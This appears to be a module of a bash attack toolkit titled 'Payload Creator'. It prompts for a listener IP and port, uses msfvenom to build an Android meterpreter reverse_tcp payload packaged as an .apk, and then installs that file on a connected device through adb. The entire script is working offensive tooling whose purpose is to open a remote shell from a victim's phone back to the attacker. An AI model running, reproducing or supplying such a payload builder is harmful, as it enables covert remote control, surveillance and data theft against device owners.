#!/bin/bash

clear
echo -e "\n\e[1;93m
 ______               __                 __      ______                    __
|   __ \.---.-.--.--.|  |.-----.---.-.--|  |    |      |.----.-----.---.-.|  |_.-----.----.
|    __/|  _  |  |  ||  ||  _  |  _  |  _  |    |   ---||   _|  -__|  _  ||   _|  _  |   _|
|___|   |___._|___  ||__||_____|___._|_____|    |______||__| |_____|___._||____|_____|__|
              |_____|
\e[0m"
read -p $'\n\n\e[1;91mEnter the IP address ( LHOST )\e[0m\e[1;93m : ' lhost1
read -p $'\n\e[1;91mEnter the PORT number ( LPORT )\e[0m\e[1;93m : ' lport1
read -p $'\n\e[1;91mEnter the name of the Payload .apk file.\e[0m\e[1;93m : ' name
msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost1 LPORT=$lport1 R> metasploit/$name.apk 2> /dev/null | echo -e "\n\e[1;5;92mGENERATING PAYLOAD WAIT A MOMENT.\e[0m"
echo -e "\n\e[1;93mThe payload was saved inside $PWD/metasploit/$name.apk\e[0m]"
echo

while true; do
  read -p $'\e[93;1mDo you want to install the PAYLOAD in the device.\e[1;97m (Y/N) \e[91;1m? : \e[1;93m' yn
  case $yn in
  [Yy]* ) break;;
  [Nn]* ) clear && bash modules/funtion2.sh;;
  * ) echo -e "\e[1;93mPlease answer it with\e[1;97m ( Y/N )\e[0m";;
  esac
  done
insta=$(adb install $PWD/metasploit/$name.apk)
echo
echo -e "\e[1;92mINSTALLING THE PACKAGE \e[1;91m$insta"
bash modules/funtion2.sh
